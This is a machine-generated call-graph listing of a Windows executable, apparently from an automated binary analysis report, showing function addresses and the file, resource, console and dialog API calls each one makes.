7ff75aab2708 27240 7ff75aad2320 _handle_error 8 API calls 27239->27240 27243 7ff75aab271b 27240->27243 27241->27238 27241->27244 27242->27241 27246 7ff75aab2736 27242->27246 27243->26933 27249 7ff75aaab7e8 99 API calls 2 library calls 27243->27249 27244->27239 27245 7ff75aaa20b0 33 API calls 27244->27245 27245->27239 27247 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 27246->27247 27248 7ff75aab273b 27247->27248 27249->26933 27251 7ff75aab28f6 27250->27251 27252 7ff75aab28fd 27250->27252 27251->26939 27252->27251 27254 7ff75aab2320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27252->27254 27271 7ff75aaab8a4 99 API calls Concurrency::cancel_current_task 27252->27271 27254->27252 27256 7ff75aab2bcd 27255->27256 27258 7ff75aab2be9 27255->27258 27257 7ff75aaa34cc 27256->27257 27272 7ff75aaab9c4 99 API calls Concurrency::cancel_current_task 27256->27272 27257->26968 27258->27257 27260 7ff75aab2c01 SetFilePointer 27258->27260 27260->27257 27261 7ff75aab2c1e GetLastError 27260->27261 27261->27257 27262 7ff75aab2c28 27261->27262 27262->27257 27273 7ff75aaab9c4 99 API calls Concurrency::cancel_current_task 27262->27273 27274 7ff75aab2778 27264->27274 27267 7ff75aaa35a7 27267->26947 27267->26961 27269->26941 27270->26950 27280 7ff75aab2789 _snwprintf 27274->27280 27275 7ff75aad2320 _handle_error 8 API calls 27277 7ff75aab281d 27275->27277 27276 7ff75aab2890 SetFilePointer 27278 7ff75aab28b8 GetLastError 27276->27278 27279 7ff75aab27b5 27276->27279 27277->27267 27281 7ff75aaab9c4 99 API calls Concurrency::cancel_current_task 27277->27281 27278->27279 27279->27275 27280->27276 27280->27279 27283 7ff75aaa3396 27282->27283 27284 7ff75aaa339a 27282->27284 27283->26975 27283->26976 27288 7ff75aaa3294 27284->27288 27287 7ff75aab2aa0 101 API calls 27287->27283 27289 7ff75aaa32bb 27288->27289 27291 7ff75aaa32f6 27288->27291 27290 7ff75aaa69f8 141 API calls 27289->27290 27295 7ff75aaa32db 27290->27295 27296 7ff75aaa6e74 27291->27296 27295->27287 27299 7ff75aaa6e95 27296->27299 27297 7ff75aaa69f8 141 API calls 27297->27299 27299->27297 27300 7ff75aaa331d 27299->27300 27328 7ff75aabe808 27299->27328 27300->27295 27301 7ff75aaa3904 27300->27301 27336 7ff75aaa6a7c 27301->27336 27304 7ff75aaa396a 27309 7ff75aaa399a 27304->27309 27310 7ff75aaa3989 27304->27310 27305 7ff75aaa3a8a 27307 7ff75aad2320 _handle_error 8 API calls 27305->27307 27312 7ff75aaa3a9e 27307->27312 27308 7ff75aaa394f 27308->27305 27315 7ff75aaa3ab3 27308->27315 27318 7ff75aaa3ab8 27308->27318 27313 7ff75aaa39a3 27309->27313 27314 7ff75aaa39ec 27309->27314 27368 7ff75aac0d54 27310->27368 27312->27295 27373 7ff75aac0c80 33 API calls 27313->27373 27374 7ff75aaa26b4 33 API calls memcpy_s 27314->27374 27316 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 27315->27316 27316->27318 27322 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 27318->27322 27319 7ff75aaa39b0 27323 7ff75aaa1fa0 31 API calls 27319->27323 27327 7ff75aaa39c0 memcpy_s 27319->27327 27321 7ff75aaa3a13 27375 7ff75aac0ae8 34 API calls _invalid_parameter_noinfo_noreturn 27321->27375 27326 7ff75aaa3abe 27322->27326 27323->27327 27324 7ff75aaa1fa0 31 API calls 27324->27308 27327->27324 27329 7ff75aabe811 27328->27329 27330 7ff75aabe82b 27329->27330 27334 7ff75aaab664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27329->27334 27332 7ff75aabe845 SetThreadExecutionState 27330->27332 27335 7ff75aaab664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27330->27335 27334->27330 27335->27332 27337 7ff75aaa6a96 _snwprintf 27336->27337 27338 7ff75aaa6ae4 27337->27338 27339 7ff75aaa6ac4 27337->27339 27341 7ff75aaa6d4d 27338->27341 27344 7ff75aaa6b0f 27338->27344 27414 7ff75aaa28a4 82 API calls 2 library calls 27339->27414 27443 7ff75aaa28a4 82 API calls 2 library calls 27341->27443 27343 7ff75aaa6ad0 27345 7ff75aad2320 _handle_error 8 API calls 27343->27345 27344->27343 27376 7ff75aac1f94 27344->27376 27346 7ff75aaa394b 27345->27346 27346->27304 27346->27308 27372 7ff75aaa2794 33 API calls __std_swap_ranges_trivially_swappable 27346->27372 27349 7ff75aaa6b85 27350 7ff75aaa6c2a 27349->27350 27367 7ff75aaa6b7b 27349->27367 27420 7ff75aab8968 109 API calls 27349->27420 27385 7ff75aab4760 27350->27385 27351 7ff75aaa6b80 27351->27349 27416 7ff75aaa40b0 27351->27416 27352 7ff75aaa6b6e 27415 7ff75aaa28a4 82 API calls 2 library calls 27352->27415 27358 7ff75aaa6c52 27359 7ff75aaa6cd1 27358->27359 27360 7ff75aaa6cc7 27358->27360 27421 7ff75aac1f20 27359->27421 27389 7ff75aab1794 27360->27389 27363 7ff75aaa6ccf 27441 7ff75aab4700 8 API calls _handle_error 27363->27441 27365 7ff75aaa6cfd 27365->27367 27404 7ff75aac1870 27367->27404 27370 7ff75aac0d8c 27368->27370 27369 7ff75aac0f48 27369->27308 27370->27369 27371 7ff75aaa1744 33 API calls 27370->27371 27371->27370 27372->27304 27373->27319 27374->27321 27375->27308 27377 7ff75aac2056 std::bad_alloc::bad_alloc 27376->27377 27380 7ff75aac1fc5 std::bad_alloc::bad_alloc 27376->27380 27444 7ff75aad4078 27377->27444 27378 7ff75aaa6b59 27378->27349 27378->27351 27378->27352 27380->27378 27381 7ff75aad4078 Concurrency::cancel_current_task 2 API calls 27380->27381 27382 7ff75aac200f std::bad_alloc::bad_alloc 27380->27382 27381->27382 27382->27378 27383 7ff75aad4078 Concurrency::cancel_current_task 2 API calls 27382->27383 27384 7ff75aac20a9 27383->27384 27386 7ff75aab4780 27385->27386 27388 7ff75aab478a 27385->27388 27387 7ff75aad21d0 33 API calls 27386->27387 27387->27388 27388->27358 27390 7ff75aab17be __scrt_get_show_window_mode 27389->27390 27449 7ff75aab8a48 27390->27449 27393 7ff75aab17f2 27405 7ff75aac188e 27404->27405 27407 7ff75aac18a1 27405->27407 27469 7ff75aabe948 27405->27469 27411 7ff75aac18d8 27407->27411 27465 7ff75aad236c 27407->27465 27409 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 27410 7ff75aac1ad0 27409->27410 27413 7ff75aac1a37 27411->27413 27476 7ff75aaba984 31 API calls _invalid_parameter_noinfo_noreturn 27411->27476 27413->27409 27414->27343 27415->27367 27417 7ff75aaa40dd 27416->27417 27418 7ff75aaa40d7 __scrt_get_show_window_mode 27416->27418 27417->27418 27477 7ff75aaa4120 33 API calls 2 library calls 27417->27477 27418->27349 27420->27350 27422 7ff75aac1f29 27421->27422 27423 7ff75aac1f5d 27422->27423 27424 7ff75aac1f55 27422->27424 27425 7ff75aac1f49 27422->27425 27423->27363 27501 7ff75aac3964 156 API calls 27424->27501 27478 7ff75aac20ac 27425->27478 27441->27365 27443->27343 27445 7ff75aad40b4 RtlPcToFileHeader 27444->27445 27446 7ff75aad4097 27444->27446 27447 7ff75aad40db RaiseException 27445->27447 27448 7ff75aad40cc 27445->27448 27446->27445 27447->27380 27448->27447 27451 7ff75aab8bcd 27449->27451 27455 7ff75aab8a91 memcpy_s 27449->27455 27450 7ff75aab8c1a 27452 7ff75aabe808 SetThreadExecutionState RtlPcToFileHeader RaiseException 27450->27452 27451->27450 27453 7ff75aaaa174 8 API calls 27451->27453 27456 7ff75aab8c1f 27452->27456 27453->27450 27454 7ff75aac612c 146 API calls 27454->27455 27455->27451 27455->27454 27455->27456 27457 7ff75aab4888 108 API calls 27455->27457 27458 7ff75aab28d0 104 API calls 27455->27458 27456->27393 27457->27455 27458->27455 27466 7ff75aad239f 27465->27466 27467 7ff75aad23c8 27466->27467 27468 7ff75aac1870 108 API calls 27466->27468 27467->27411 27468->27466 27470 7ff75aabecd8 103 API calls 27469->27470 27471 7ff75aabe95f ReleaseSemaphore 27470->27471 27472 7ff75aabe984 27471->27472 27473 7ff75aabe9a3 DeleteCriticalSection CloseHandle CloseHandle 27471->27473 27474 7ff75aabea5c 101 API calls 27472->27474 27475 7ff75aabe98e CloseHandle 27474->27475 27475->27472 27475->27473 27476->27413 27479 7ff75aac20c8 __scrt_get_show_window_mode 27478->27479 27480 7ff75aac21ba 27479->27480 27481 7ff75aad24a0 33 API calls 27479->27481 27482 7ff75aac2155 __scrt_get_show_window_mode 27479->27482 27481->27482 27482->27480 27501->27423 27511 7ff75aab8882 27510->27511 27512 7ff75aab8892 27510->27512 27517 7ff75aab23f0 27511->27517 27512->26981 27515 7ff75aad2320 _handle_error 8 API calls 27514->27515 27516 7ff75aaaf7dc 27515->27516 27516->26872 27516->27194 27518 7ff75aab240f 27517->27518 27521 7ff75aab2aa0 101 API calls 27518->27521 27519 7ff75aab2428 27522 7ff75aab2bb0 101 API calls 27519->27522 27520 7ff75aab2438 27520->27512 27521->27519 27522->27520 27524 7ff75aaa5e67 27523->27524 27526 7ff75aaa5ea5 27524->27526 27532 7ff75aaa5eb7 27524->27532 27554 7ff75aaa6084 27524->27554 27618 7ff75aaa28a4 82 API calls 2 library calls 27526->27618 27528 7ff75aaa6134 27625 7ff75aaa6fcc 82 API calls 27528->27625 27530 7ff75aaa5f44 27620 7ff75aaa6d88 82 API calls 27530->27620 27531 7ff75aaa69af 27534 7ff75aad2320 _handle_error 8 API calls 27531->27534 27532->27528 27532->27530 27619 7ff75aaa6f38 33 API calls memcpy_s 27532->27619 27537 7ff75aaa69c3 27534->27537 27536 7ff75aaa69e4 27539 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 27536->27539 27537->26992 27538 7ff75aaa6973 27602 7ff75aaa5eb2 27538->27602 27637 7ff75aaa466c 82 API calls 27538->27637 27543 7ff75aaa69e9 27539->27543 27542 7ff75aaa612e 27542->27528 27542->27538 27546 7ff75aab85f0 104 API calls 27542->27546 27545 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 27543->27545 27544 7ff75aaa6034 27548 7ff75aad236c 108 API calls 27544->27548 27544->27554 27547 7ff75aaa69ef 27545->27547 27549 7ff75aaa61a4 27546->27549 27551 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 27547->27551 27550 7ff75aaa606e 27548->27550 27549->27528 27559 7ff75aaa61ac 27549->27559 27553 7ff75aad236c 108 API calls 27550->27553 27552 7ff75aaa69f5 27551->27552 27553->27554 27608 7ff75aab85f0 27554->27608 27555 7ff75aaa6097 27624 7ff75aaa433c 82 API calls 2 library calls 27555->27624 27558 7ff75aaa5f5d 27558->27544 27558->27555 27621 7ff75aaa433c 82 API calls 2 library calls 27558->27621 27622 7ff75aaa6d88 82 API calls 27558->27622 27623 7ff75aaaa1a0 109 API calls _handle_error 27558->27623 27560 7ff75aaa623f 27559->27560 27626 7ff75aaa466c 82 API calls 27559->27626 27560->27538 27562 7ff75aaa60a1 27564 7ff75aad236c 108 API calls 27562->27564 27562->27602 27565 7ff75aaa60f4 27564->27565 27602->27531 27602->27536 27602->27547 27606->26992 27609 7ff75aab8614 27608->27609 27610 7ff75aab869a 27608->27610 27611 7ff75aaa40b0 33 API calls 27609->27611 27616 7ff75aab867c 27609->27616 27612 7ff75aaa40b0 33 API calls 27610->27612 27610->27616 27613 7ff75aab864d 27611->27613 27614 7ff75aab86b3 27612->27614 27638 7ff75aaaa174 27613->27638 27617 7ff75aab28d0 104 API calls 27614->27617 27616->27542 27617->27616 27618->27602 27620->27558 27621->27558 27622->27558 27623->27558 27624->27562 27625->27602 27639 7ff75aaaa185 27638->27639 27640 7ff75aaaa19a 27639->27640 27642 7ff75aabaf18 8 API calls 2 library calls 27639->27642 27640->27616 27642->27640 27650 7ff75aaa9be7 27643->27650 27644 7ff75aaa9c1b 27645 7ff75aad2320 _handle_error 8 API calls 27644->27645 27646 7ff75aaa9c9d 27645->27646 27646->27009 27649 7ff75aaa1fa0 31 API calls 27649->27644 27650->27644 27651 7ff75aaa9cae 27650->27651 27655 7ff75aaa9c83 27650->27655 27778 7ff75aab5294 27650->27778 27796 7ff75aabdb60 27650->27796 27652 7ff75aaa9cbf 27651->27652 27800 7ff75aabda48 CompareStringW 27651->27800 27654 7ff75aaa20b0 33 API calls 27652->27654 27652->27655 27654->27655 27655->27649 27669 7ff75aab5f3a 27656->27669 27657 7ff75aad2320 _handle_error 8 API calls 27658 7ff75aaafb29 27657->27658 27658->27013 27729 7ff75aab7c94 47 API calls 2 library calls 27658->27729 27660 7ff75aaa129c 33 API calls 27662 7ff75aab6129 27660->27662 27661 7ff75aab61d4 27663 7ff75aaa1fa0 31 API calls 27662->27663 27665 7ff75aab613b memcpy_s 27662->27665 27663->27665 27664 7ff75aab619b 27664->27657 27665->27664 27666 7ff75aab61c9 27665->27666 27668 7ff75aab61ce 27804 7ff75aaa704c 47 API calls memcpy_s 27668->27804 27669->27660 27669->27664 27669->27668 27728->27001 27776->27008 27777->27008 27779 7ff75aab52d4 27778->27779 27783 7ff75aab5339 __vcrt_InitializeCriticalSectionEx 27779->27783 27784 7ff75aab5312 __vcrt_InitializeCriticalSectionEx 27779->27784 27801 7ff75aac13f4 CompareStringW 27779->27801 27780 7ff75aad2320 _handle_error 8 API calls 27781 7ff75aab5503 27780->27781 27781->27650 27783->27780 27784->27783 27786 7ff75aab5382 __vcrt_InitializeCriticalSectionEx 27784->27786 27802 7ff75aac13f4 CompareStringW 27784->27802 27786->27783 27787 7ff75aab5439 27786->27787 27788 7ff75aaa129c 33 API calls 27786->27788 27790 7ff75aab551b 27787->27790 27791 7ff75aab5489 27787->27791 27789 7ff75aab5426 27788->27789 27792 7ff75aab72cc 8 API calls 27789->27792 27793 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 27790->27793 27791->27783 27803 7ff75aac13f4 CompareStringW 27791->27803 27792->27787 27795 7ff75aab5520 27793->27795 27798 7ff75aabdb73 27796->27798 27797 7ff75aabdb91 27797->27650 27798->27797 27799 7ff75aaa20b0 33 API calls 27798->27799 27799->27797 27800->27652 27801->27784 27802->27786 27803->27783 27804->27661 27864->27176 27865->27180 27866->27184 27868 7ff75aab87af 27867->27868 27879 7ff75aab87df 27867->27879 27869 7ff75aad236c 108 API calls 27868->27869 27871 7ff75aab87ca 27869->27871 27875 7ff75aad236c 108 API calls 27871->27875 27872 7ff75aad236c 108 API calls 27873 7ff75aab8814 27872->27873 27876 7ff75aad236c 108 API calls 27873->27876 27874 7ff75aab8845 27877 7ff75aab461c 108 API calls 27874->27877 27875->27879 27880 7ff75aab882b 27876->27880 27878 7ff75aab8851 27877->27878 27879->27872 27879->27880 27881 7ff75aab461c 27880->27881 27882 7ff75aab4632 27881->27882 27884 7ff75aab463a 27881->27884 27883 7ff75aabe948 108 API calls 27882->27883 27883->27884 27884->27874 27886 7ff75aab163e 27885->27886 27891 7ff75aab1681 27885->27891 27890 7ff75aab31bc 51 API calls 27886->27890 27886->27891 27887 7ff75aab16a0 27889 7ff75aaae600 31 API calls 27887->27889 27888 7ff75aaa1fa0 31 API calls 27888->27891 27894 7ff75aab16de 27889->27894 27890->27886 27891->27887 27891->27888 27892 7ff75aab175b 27895 7ff75aad2320 _handle_error 8 API calls 27892->27895 27893 7ff75aab178d 27897 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 27893->27897 27894->27892 27894->27893 27896 7ff75aaae58a 27895->27896 27896->26786 27896->26787 27898 7ff75aab1792 27897->27898 27900 7ff75aac84cc 4 API calls 27899->27900 27901 7ff75aac84aa 27900->27901 27902 7ff75aac84b9 27901->27902 27911 7ff75aac8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27901->27911 27902->26262 27902->26263 27904->26264 27905->26274 27907 7ff75aac84de 27906->27907 27908 7ff75aac84e3 27906->27908 27912 7ff75aac8590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27907->27912 27908->26274 27910->26277 27911->27902 27912->27908 27913->26301 27915->26324 27916->26340 27917 7ff75aad20f0 27918 7ff75aad2106 _com_error::_com_error 27917->27918 27919 7ff75aad4078 Concurrency::cancel_current_task 2 API calls 27918->27919 27920 7ff75aad2117 27919->27920 27921 7ff75aad1900 _com_raise_error 14 API calls 27920->27921 27922 7ff75aad2163 27921->27922 27923 7ff75aad1491 27924 7ff75aad13c9 27923->27924 27925 7ff75aad1900 _com_raise_error 14 API calls 27924->27925 27926 7ff75aad1408 27925->27926 27931 7ff75aadd94c 27932 7ff75aadd997 27931->27932 27936 7ff75aadd95b abort 27931->27936 27938 7ff75aadd69c 15 API calls _invalid_parameter_noinfo 27932->27938 27934 7ff75aadd97e HeapAlloc 27935 7ff75aadd995 27934->27935 27934->27936 27936->27932 27936->27934 27937 7ff75aadbbc0 abort 2 API calls 27936->27937 27937->27936 27938->27935 27939 7ff75aadbf2c 27946 7ff75aadbc34 27939->27946 27951 7ff75aadd440 35 API calls 2 library calls 27946->27951 27949 7ff75aadbc3f 27952 7ff75aadd068 35 API calls abort 27949->27952 27951->27949 27953 7ff75aad2d6c 27978 7ff75aad27fc 27953->27978 27956 7ff75aad2eb8 28077 7ff75aad3170 7 API calls 2 library calls 27956->28077 27958 7ff75aad2ec2 28078 7ff75aad3170 7 API calls 2 library calls 27958->28078 27959 7ff75aad2d88 __scrt_acquire_startup_lock 27959->27958 27961 7ff75aad2da6 27959->27961 27962 7ff75aad2dcb 27961->27962 27968 7ff75aad2de8 __scrt_release_startup_lock 27961->27968 27986 7ff75aadcd90 27961->27986 27964 7ff75aad2ecd abort 27965 7ff75aad2e51 27990 7ff75aad32bc 27965->27990 27967 7ff75aad2e56 27993 7ff75aadcd20 27967->27993 27968->27965 28074 7ff75aadc050 35 API calls __GSHandlerCheck_EH 27968->28074 28079 7ff75aad2fb0 27978->28079 27981 7ff75aad282b 28081 7ff75aadcc50 27981->28081 27982 7ff75aad2827 27982->27956 27982->27959 27987 7ff75aadcdcc 27986->27987 27988 7ff75aadcdeb 27986->27988 27987->27988 28098 7ff75aaa1120 27987->28098 27988->27968 27991 7ff75aad3cf0 __scrt_get_show_window_mode 27990->27991 27992 7ff75aad32d3 GetStartupInfoW 27991->27992 27992->27967 28104 7ff75aae0730 27993->28104 27995 7ff75aad2e5e 27998 7ff75aad0754 27995->27998 27996 7ff75aadcd2f 27996->27995 28108 7ff75aae0ac0 35 API calls _snwprintf 27996->28108 28110 7ff75aabdfd0 27998->28110 28001 7ff75aab62dc 35 API calls 28002 7ff75aad079a 28001->28002 28187 7ff75aac946c 28002->28187 28004 7ff75aad07a4 __scrt_get_show_window_mode 28192 7ff75aac9a14 28004->28192 28006 7ff75aad0819 28007 7ff75aad096e GetCommandLineW 28006->28007 28056 7ff75aad0ddc 28006->28056 28010 7ff75aad0980 28007->28010 28049 7ff75aad0b42 28007->28049 28008 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 28009 7ff75aad0de2 28008->28009 28013 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 28009->28013 28015 7ff75aaa129c 33 API calls 28010->28015 28011 7ff75aab6454 34 API calls 28012 7ff75aad0b51 28011->28012 28016 7ff75aaa1fa0 31 API calls 28012->28016 28024 7ff75aad0b68 memcpy_s 28012->28024 28014 7ff75aad0de8 28013->28014 28021 7ff75aad1900 _com_raise_error 14 API calls 28014->28021 28018 7ff75aad09a5 28015->28018 28016->28024 28017 7ff75aaa1fa0 31 API calls 28020 7ff75aad0b93 SetEnvironmentVariableW GetLocalTime 28017->28020 28233 7ff75aaccad0 102 API calls 3 library calls 28018->28233 28022 7ff75aab3e28 swprintf 46 API calls 28020->28022 28023 7ff75aad0e34 28021->28023 28025 7ff75aad0c18 SetEnvironmentVariableW GetModuleHandleW LoadIconW 28022->28025 28023->28023 28024->28017 28202 7ff75aacb014 LoadBitmapW 28025->28202 28026 7ff75aad09af 28026->28009 28027 7ff75aad0adb 28026->28027 28028 7ff75aad09f9 OpenFileMappingW 28026->28028 28036 7ff75aaa129c 33 API calls 28027->28036 28030 7ff75aad0ad0 CloseHandle 28028->28030 28031 7ff75aad0a19 MapViewOfFile 28028->28031 28030->28049 28031->28030 28034 7ff75aad0a3f UnmapViewOfFile MapViewOfFile 28031->28034 28034->28030 28037 7ff75aad0a71 28034->28037 28035 7ff75aad0c75 28226 7ff75aac67b4 28035->28226 28039 7ff75aad0b00 28036->28039 28234 7ff75aaca190 33 API calls 2 library calls 28037->28234 28238 7ff75aacfd0c 35 API calls 2 library calls 28039->28238 28043 7ff75aad0a81 28235 7ff75aacfd0c 35 API calls 2 library calls 28043->28235 28044 7ff75aac67b4 33 API calls 28047 7ff75aad0c87 DialogBoxParamW 28044->28047 28045 7ff75aad0b0a 28045->28049 28052 7ff75aad0dd7 28045->28052 28057 7ff75aad0cd3 28047->28057 28048 7ff75aad0a90 28236 7ff75aabb9b4 102 API calls 28048->28236 28049->28011 28051 7ff75aad0aa5 28237 7ff75aabbb00 102 API calls 28051->28237 28054 7ff75aad7904 _invalid_parameter_noinfo_noreturn 31 API calls 28052->28054 28054->28056 28055 7ff75aad0ab8 28060 7ff75aad0ac7 UnmapViewOfFile 28055->28060 28056->28008 28058 7ff75aad0ce6 Sleep 28057->28058 28059 7ff75aad0cec 28057->28059 28058->28059 28061 7ff75aad0cfa 28059->28061 28239 7ff75aac9f4c 49 API calls 2 library calls 28059->28239 28060->28030 28063 7ff75aad0d06 DeleteObject 28061->28063 28064 7ff75aad0d25 28063->28064 28065 7ff75aad0d1f DeleteObject 28063->28065 28066 7ff75aad0d5b 28064->28066 28067 7ff75aad0d6d 28064->28067 28065->28064 28240 7ff75aacfe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 28066->28240 28229 7ff75aac94e4 28067->28229 28070 7ff75aad0d60 CloseHandle 28070->28067 28074->27965 28077->27958 28078->27964 28080 7ff75aad281e __scrt_dllmain_crt_thread_attach 28079->28080 28080->27981 28080->27982 28083 7ff75aae0d4c 28081->28083 28082 7ff75aad2830 28082->27982 28085 7ff75aad51a0 7 API calls 2 library calls 28082->28085 28083->28082 28086 7ff75aadec00 28083->28086 28085->27982 28097 7ff75aadf398 EnterCriticalSection 28086->28097 28099 7ff75aaa91c8 35 API calls 28098->28099 28100 7ff75aaa1130 28099->28100 28103 7ff75aad29bc 34 API calls 28100->28103 28102 7ff75aad2a01 28102->27987 28103->28102 28105 7ff75aae0749 28104->28105 28106 7ff75aae073d 28104->28106 28105->27996 28109 7ff75aae0570 48 API calls 4 library calls 28106->28109 28108->27996 28109->28105 28241 7ff75aad2450 28110->28241 28113 7ff75aabe026 GetProcAddress 28116 7ff75aabe053 GetProcAddress 28113->28116 28117 7ff75aabe03b 28113->28117 28114 7ff75aabe07b 28115 7ff75aabe503 28114->28115 28248 7ff75aadb788 39 API calls _snwprintf 28114->28248 28118 7ff75aab6454 34 API calls 28115->28118 28116->28114 28119 7ff75aabe068 28116->28119 28117->28116 28121 7ff75aabe50c 28118->28121 28119->28114 28123 7ff75aab7df4 47 API calls 28121->28123 28122 7ff75aabe3b0 28122->28115 28124 7ff75aabe3ba 28122->28124 28150 7ff75aabe51a 28123->28150 28125 7ff75aab6454 34 API calls 28124->28125 28126 7ff75aabe3c3 CreateFileW 28125->28126 28128 7ff75aabe4f0 CloseHandle 28126->28128 28129 7ff75aabe403 SetFilePointer 28126->28129 28131 7ff75aaa1fa0 31 API calls 28128->28131 28129->28128 28130 7ff75aabe41c ReadFile 28129->28130 28130->28128 28132 7ff75aabe444 28130->28132 28131->28115 28133 7ff75aabe800 28132->28133 28134 7ff75aabe458 28132->28134 28254 7ff75aad2624 8 API calls 28133->28254 28139 7ff75aaa129c 33 API calls 28134->28139 28136 7ff75aabe805 28137 7ff75aabe53e CompareStringW 28137->28150 28138 7ff75aaa129c 33 API calls 28138->28150 28143 7ff75aabe48f 28139->28143 28140 7ff75aab8090 47 API calls 28140->28150 28141 7ff75aaa1fa0 31 API calls 28141->28150 28147 7ff75aabe4db 28143->28147 28249 7ff75aabd0a0 33 API calls 28143->28249 28144 7ff75aabe7c2 28149 7ff75aaa1fa0 31 API calls 28144->28149 28145 7ff75aabe648 28250 7ff75aab7eb0 47 API calls 28145->28250 28146 7ff75aab32bc 51 API calls 28146->28150 28151 7ff75aaa1fa0 31 API calls 28147->28151 28153 7ff75aabe7cb 28149->28153 28150->28137 28150->28138 28150->28140 28150->28141 28150->28146 28170 7ff75aabe5cc 28150->28170 28243 7ff75aab51a4 28150->28243 28155 7ff75aabe4e5 28151->28155 28152 7ff75aabe651 28156 7ff75aab51a4 9 API calls 28152->28156 28154 7ff75aaa1fa0 31 API calls 28153->28154 28158 7ff75aabe7d5 28154->28158 28159 7ff75aaa1fa0 31 API calls 28155->28159 28160 7ff75aabe656 28156->28160 28157 7ff75aaa129c 33 API calls 28157->28170 28163 7ff75aad2320 _handle_error 8 API calls 28158->28163 28159->28128 28161 7ff75aabe706 28160->28161 28168 7ff75aabe661 28160->28168 28164 7ff75aabda98 48 API calls 28161->28164 28162 7ff75aab8090 47 API calls 28162->28170 28165 7ff75aabe7e4 28163->28165 28166 7ff75aabe74b AllocConsole 28164->28166 28165->28001 28169 7ff75aabe755 GetCurrentProcessId AttachConsole 28166->28169 28186 7ff75aabe6fb 28166->28186 28167 7ff75aaa1fa0 31 API calls 28167->28170 28173 7ff75aabaae0 48 API calls 28168->28173 28171 7ff75aabe76c 28169->28171 28170->28157 28170->28162 28170->28167 28172 7ff75aab32bc 51 API calls 28170->28172 28179 7ff75aabe63a 28170->28179 28178 7ff75aabe778 GetStdHandle WriteConsoleW Sleep FreeConsole 28171->28178 28172->28170 28175 7ff75aabe6a5 28173->28175 28177 7ff75aabda98 48 API calls 28175->28177 28176 7ff75aabe7b9 ExitProcess 28180 7ff75aabe6c3 28177->28180 28178->28186 28179->28144 28179->28145 28181 7ff75aabaae0 48 API calls 28180->28181 28182 7ff75aabe6ce 28181->28182 28251 7ff75aabdc2c 33 API calls 28182->28251 28184 7ff75aabe6da 28252 7ff75aaa19e0 31 API calls _invalid_parameter_noinfo_noreturn 28184->28252 28253 7ff75aaa19e0 31 API calls _invalid_parameter_noinfo_noreturn 28186->28253 28188 7ff75aabdd88 28187->28188 28189 7ff75aac9481 OleInitialize 28188->28189 28190 7ff75aac94a7 28189->28190 28191 7ff75aac94cd SHGetMalloc 28190->28191 28191->28004 28193 7ff75aac9a49 28192->28193 28196 7ff75aac9a4e memcpy_s 28192->28196 28194 7ff75aaa1fa0 31 API calls 28193->28194 28194->28196 28195 7ff75aaa1fa0 31 API calls 28197 7ff75aac9a7d memcpy_s 28195->28197 28196->28195 28196->28197 28198 7ff75aaa1fa0 31 API calls 28197->28198 28201 7ff75aac9aac memcpy_s 28197->28201 28198->28201 28199 7ff75aac9adb memcpy_s 28199->28006 28200 7ff75aaa1fa0 31 API calls 28200->28199 28201->28199 28201->28200 28203 7ff75aacb03e 28202->28203 28204 7ff75aacb046 28202->28204 28255 7ff75aac8624 FindResourceW 28203->28255 28206 7ff75aacb063 28204->28206 28207 7ff75aacb04e GetObjectW 28204->28207 28208 7ff75aac849c 4 API calls 28206->28208 28207->28206 28209 7ff75aacb078 28208->28209 28210 7ff75aacb0ce 28209->28210 28211 7ff75aacb09e 28209->28211 28212 7ff75aac8624 11 API calls 28209->28212 28221 7ff75aab98ac 28210->28221 28270 7ff75aac8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28211->28270 28214 7ff75aacb08a 28212->28214 28214->28211 28216 7ff75aacb092 DeleteObject 28214->28216 28215 7ff75aacb0a7 28217 7ff75aac84cc 4 API calls 28215->28217 28216->28211 28218 7ff75aacb0b2 28217->28218 28271 7ff75aac8df4 16 API calls _handle_error 28218->28271 28220 7ff75aacb0bf DeleteObject 28220->28210 28272 7ff75aab98dc 28221->28272 28223 7ff75aab98ba 28339 7ff75aaba43c GetModuleHandleW FindResourceW 28223->28339 28225 7ff75aab98c2 28225->28035 28227 7ff75aad21d0 33 API calls 28226->28227 28228 7ff75aac67fa 28227->28228 28228->28044 28230 7ff75aac9501 28229->28230 28231 7ff75aac950a OleUninitialize 28230->28231 28232 7ff75ab0e330 28231->28232 28233->28026 28234->28043 28235->28048 28236->28051 28237->28055 28238->28045 28239->28061 28240->28070 28242 7ff75aabdff4 GetModuleHandleW 28241->28242 28242->28113 28242->28114 28244 7ff75aab51c8 GetVersionExW 28243->28244 28245 7ff75aab51fb 28243->28245 28244->28245 28246 7ff75aad2320 _handle_error 8 API calls 28245->28246 28247 7ff75aab5228 28246->28247 28247->28150 28248->28122 28249->28143 28250->28152 28251->28184 28252->28186 28253->28176 28254->28136 28256 7ff75aac864f SizeofResource 28255->28256 28258 7ff75aac879b 28255->28258 28257 7ff75aac8669 LoadResource 28256->28257 28256->28258 28257->28258 28259 7ff75aac8682 LockResource 28257->28259 28258->28204 28259->28258 28260 7ff75aac8697 GlobalAlloc 28259->28260 28260->28258 28261 7ff75aac86b8 GlobalLock 28260->28261 28262 7ff75aac8792 GlobalFree 28261->28262 28263 7ff75aac86ca memcpy_s 28261->28263 28262->28258 28264 7ff75aac86d8 CreateStreamOnHGlobal 28263->28264 28265 7ff75aac86f6 GdipAlloc 28264->28265 28266 7ff75aac8789 GlobalUnlock 28264->28266 28267 7ff75aac870b 28265->28267 28266->28262 28267->28266 28268 7ff75aac8772 28267->28268 28269 7ff75aac875a GdipCreateHBITMAPFromBitmap 28267->28269 28268->28266 28269->28268 28270->28215 28271->28220 28275 7ff75aab98fe _snwprintf 